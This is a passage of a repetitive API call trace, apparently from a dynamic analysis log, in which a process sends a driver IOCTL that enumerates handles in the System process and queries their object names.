ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.097] ObReferenceObjectByHandle (in: Handle=0xffffffff800008cc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069b8dbe0, HandleInformation=0x0) returned 0x0 [0258.097] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.097] PsReleaseProcessExitSynchronization () returned 0x2 [0258.097] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa28 [0258.097] ObQueryNameString (in: Object=0xffffe00069b8dbe0, ObjectNameInfo=0xffffe0006919b7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006919b7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.097] ObfDereferenceObject (Object=0xffffe00069b8dbe0) returned 0x8000 [0258.097] IoCompleteRequest () returned 0x0 [0258.098] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x8e, lpOverlapped=0x0) returned 1 [0258.098] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.098] PsAcquireProcessExitSynchronization () returned 0x0 [0258.098] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.098] ObReferenceObjectByHandle (in: Handle=0xffffffff800008d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069ba6cd0, HandleInformation=0x0) returned 0x0 [0258.098] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.098] PsReleaseProcessExitSynchronization () returned 0x2 [0258.098] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa27 [0258.098] ObQueryNameString (in: Object=0xffffe00069ba6cd0, ObjectNameInfo=0xffffe0006a5164c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a5164c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.098] ObfDereferenceObject (Object=0xffffe00069ba6cd0) returned 0x800f [0258.098] IoCompleteRequest () returned 0x0 [0258.098] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x74, lpOverlapped=0x0) returned 1 [0258.098] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.098] PsAcquireProcessExitSynchronization () returned 0x0 [0258.098] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.098] ObReferenceObjectByHandle (in: Handle=0xffffffff800008dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069b9c090, HandleInformation=0x0) returned 0x0 [0258.098] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.098] PsReleaseProcessExitSynchronization () returned 0x2 [0258.098] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa26 [0258.098] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a3ef7c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3ef7c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0258.098] ObfDereferenceObject (Object=0xffffe00069b9c090) returned 0x7ed2 [0258.098] IoCompleteRequest () returned 0x0 [0258.098] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0258.098] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.098] PsAcquireProcessExitSynchronization () returned 0x0 [0258.098] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.098] ObReferenceObjectByHandle (in: Handle=0xffffffff800008e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069b9d760, HandleInformation=0x0) returned 0x0 [0258.098] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.098] PsReleaseProcessExitSynchronization () returned 0x2 [0258.098] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa25 [0258.098] ObQueryNameString (in: Object=0xffffe00069b9d760, ObjectNameInfo=0xffffe000699427c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000699427c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.098] ObfDereferenceObject (Object=0xffffe00069b9d760) returned 0x7ff8 [0258.098] IoCompleteRequest () returned 0x0 [0258.098] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0258.098] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.098] PsAcquireProcessExitSynchronization () returned 0x0 [0258.099] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.099] ObReferenceObjectByHandle (in: Handle=0xffffffff800008e4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069b9e910, HandleInformation=0x0) returned 0x0 [0258.099] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.099] PsReleaseProcessExitSynchronization () returned 0x2 [0258.099] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa24 [0258.099] ObQueryNameString (in: Object=0xffffe00069b9e910, ObjectNameInfo=0xffffe0006a43b7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a43b7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.099] ObfDereferenceObject (Object=0xffffe00069b9e910) returned 0x7ffe [0258.099] IoCompleteRequest () returned 0x0 [0258.099] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x118, lpOverlapped=0x0) returned 1 [0258.099] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.099] PsAcquireProcessExitSynchronization () returned 0x0 [0258.099] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.099] ObReferenceObjectByHandle (in: Handle=0xffffffff800008f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069b8c620, HandleInformation=0x0) returned 0x0 [0258.099] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.099] PsReleaseProcessExitSynchronization () returned 0x2 [0258.099] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa23 [0258.099] ObQueryNameString (in: Object=0xffffe00069b8c620, ObjectNameInfo=0xffffe0006a604704, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a604704, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.099] ObfDereferenceObject (Object=0xffffe00069b8c620) returned 0x8000 [0258.099] IoCompleteRequest () returned 0x0 [0258.099] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0xce, lpOverlapped=0x0) returned 1 [0258.099] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.099] PsAcquireProcessExitSynchronization () returned 0x0 [0258.099] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.099] ObReferenceObjectByHandle (in: Handle=0xffffffff800008f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069b8c790, HandleInformation=0x0) returned 0x0 [0258.099] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.099] PsReleaseProcessExitSynchronization () returned 0x2 [0258.099] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa22 [0258.099] ObQueryNameString (in: Object=0xffffe00069b8c790, ObjectNameInfo=0xffffe0006a9af044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a9af044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.099] ObfDereferenceObject (Object=0xffffe00069b8c790) returned 0x8000 [0258.099] IoCompleteRequest () returned 0x0 [0258.099] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x118, lpOverlapped=0x0) returned 1 [0258.099] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.099] PsAcquireProcessExitSynchronization () returned 0x0 [0258.099] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.100] ObReferenceObjectByHandle (in: Handle=0xffffffff800008fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069ba79d0, HandleInformation=0x0) returned 0x0 [0258.100] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.100] PsReleaseProcessExitSynchronization () returned 0x2 [0258.100] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa21 [0258.100] ObQueryNameString (in: Object=0xffffe00069ba79d0, ObjectNameInfo=0xffffe0006a610704, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a610704, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.100] ObfDereferenceObject (Object=0xffffe00069ba79d0) returned 0x8000 [0258.100] IoCompleteRequest () returned 0x0 [0258.100] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x14, lpOverlapped=0x0) returned 1 [0258.100] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.100] PsAcquireProcessExitSynchronization () returned 0x0 [0258.100] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.100] ObReferenceObjectByHandle (in: Handle=0xffffffff80000904, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069baecd0, HandleInformation=0x0) returned 0x0 [0258.100] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.100] PsReleaseProcessExitSynchronization () returned 0x2 [0258.100] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa20 [0258.100] ObQueryNameString (in: Object=0xffffe00069baecd0, ObjectNameInfo=0xffffe0006a70c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a70c7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.100] ObfDereferenceObject (Object=0xffffe00069baecd0) returned 0x7fff [0258.100] IoCompleteRequest () returned 0x0 [0258.100] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x14, lpOverlapped=0x0) returned 1 [0258.100] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.100] PsAcquireProcessExitSynchronization () returned 0x0 [0258.100] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.100] ObReferenceObjectByHandle (in: Handle=0xffffffff80000908, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069baea40, HandleInformation=0x0) returned 0x0 [0258.100] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.100] PsReleaseProcessExitSynchronization () returned 0x2 [0258.100] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa1f [0258.100] ObQueryNameString (in: Object=0xffffe00069baea40, ObjectNameInfo=0xffffe0006904d7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006904d7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.100] ObfDereferenceObject (Object=0xffffe00069baea40) returned 0x8000 [0258.100] IoCompleteRequest () returned 0x0 [0258.100] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x112, lpOverlapped=0x0) returned 1 [0258.100] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.100] PsAcquireProcessExitSynchronization () returned 0x0 [0258.100] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.100] ObReferenceObjectByHandle (in: Handle=0xffffffff80000914, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069bb2600, HandleInformation=0x0) returned 0x0 [0258.101] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.101] PsReleaseProcessExitSynchronization () returned 0x2 [0258.101] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa1e [0258.101] ObQueryNameString (in: Object=0xffffe00069bb2600, ObjectNameInfo=0xffffe00069f22044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00069f22044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.101] ObfDereferenceObject (Object=0xffffe00069bb2600) returned 0x8000 [0258.101] IoCompleteRequest () returned 0x0 [0258.101] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0xb8, lpOverlapped=0x0) returned 1 [0258.103] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.103] PsAcquireProcessExitSynchronization () returned 0x0 [0258.103] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.103] ObReferenceObjectByHandle (in: Handle=0xffffffff80000918, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069bb2f20, HandleInformation=0x0) returned 0x0 [0258.103] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.103] PsReleaseProcessExitSynchronization () returned 0x2 [0258.103] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa1d [0258.103] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a4f5044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a4f5044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0258.103] ObfDereferenceObject (Object=0xffffe00069bb2f20) returned 0x7f1b [0258.103] IoCompleteRequest () returned 0x0 [0258.103] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0xc2, lpOverlapped=0x0) returned 1 [0258.103] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.103] PsAcquireProcessExitSynchronization () returned 0x0 [0258.103] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.103] ObReferenceObjectByHandle (in: Handle=0xffffffff8000091c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000699fb900, HandleInformation=0x0) returned 0x0 [0258.103] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.103] PsReleaseProcessExitSynchronization () returned 0x2 [0258.103] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa1c [0258.103] ObQueryNameString (in: Object=0xffffe000699fb900, ObjectNameInfo=0xffffe0006a65b044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a65b044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.103] ObfDereferenceObject (Object=0xffffe000699fb900) returned 0x7ffb [0258.103] IoCompleteRequest () returned 0x0 [0258.103] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0xc2, lpOverlapped=0x0) returned 1 [0258.103] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.103] PsAcquireProcessExitSynchronization () returned 0x0 [0258.103] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.103] ObReferenceObjectByHandle (in: Handle=0xffffffff80000920, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069baf690, HandleInformation=0x0) returned 0x0 [0258.103] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.103] PsReleaseProcessExitSynchronization () returned 0x2 [0258.103] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa1b [0258.103] ObQueryNameString (in: Object=0xffffe00069baf690, ObjectNameInfo=0xffffe0006a50f044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a50f044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.103] ObfDereferenceObject (Object=0xffffe00069baf690) returned 0x7ffe [0258.104] IoCompleteRequest () returned 0x0 [0258.104] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x15c, lpOverlapped=0x0) returned 1 [0258.104] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.104] PsAcquireProcessExitSynchronization () returned 0x0 [0258.104] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.104] ObReferenceObjectByHandle (in: Handle=0xffffffff80000924, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069baff20, HandleInformation=0x0) returned 0x0 [0258.104] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.104] PsReleaseProcessExitSynchronization () returned 0x2 [0258.104] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa1a [0258.104] ObQueryNameString (in: Object=0xffffe00069baff20, ObjectNameInfo=0xffffe0006a4397c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a4397c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.104] ObfDereferenceObject (Object=0xffffe00069baff20) returned 0x8000 [0258.104] IoCompleteRequest () returned 0x0 [0258.104] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x15c, lpOverlapped=0x0) returned 1 [0258.104] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.104] PsAcquireProcessExitSynchronization () returned 0x0 [0258.104] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.104] ObReferenceObjectByHandle (in: Handle=0xffffffff80000928, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006950af20, HandleInformation=0x0) returned 0x0 [0258.104] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.104] PsReleaseProcessExitSynchronization () returned 0x2 [0258.104] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa19 [0258.104] ObQueryNameString (in: Object=0xffffe0006950af20, ObjectNameInfo=0xffffe000690ef044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000690ef044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.104] ObfDereferenceObject (Object=0xffffe0006950af20) returned 0x8000 [0258.104] IoCompleteRequest () returned 0x0 [0258.104] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x14, lpOverlapped=0x0) returned 1 [0258.104] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.104] PsAcquireProcessExitSynchronization () returned 0x0 [0258.104] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.104] ObReferenceObjectByHandle (in: Handle=0xffffffff80000930, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069bb9f20, HandleInformation=0x0) returned 0x0 [0258.104] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.104] PsReleaseProcessExitSynchronization () returned 0x2 [0258.104] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa18 [0258.104] ObQueryNameString (in: Object=0xffffe00069bb9f20, ObjectNameInfo=0xffffe0006914d044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006914d044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.105] ObfDereferenceObject (Object=0xffffe00069bb9f20) returned 0x7fff [0258.105] IoCompleteRequest () returned 0x0 [0258.105] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x14, lpOverlapped=0x0) returned 1 [0258.105] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.105] PsAcquireProcessExitSynchronization () returned 0x0 [0258.105] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.105] ObReferenceObjectByHandle (in: Handle=0xffffffff80000934, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069bb27a0, HandleInformation=0x0) returned 0x0 [0258.105] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.105] PsReleaseProcessExitSynchronization () returned 0x2 [0258.105] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa17 [0258.105] ObQueryNameString (in: Object=0xffffe00069bb27a0, ObjectNameInfo=0xffffe00068a64044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a64044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.105] ObfDereferenceObject (Object=0xffffe00069bb27a0) returned 0x8000 [0258.105] IoCompleteRequest () returned 0x0 [0258.105] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpOutBuffer=0x315480, lpBytesReturned=0x14d450, 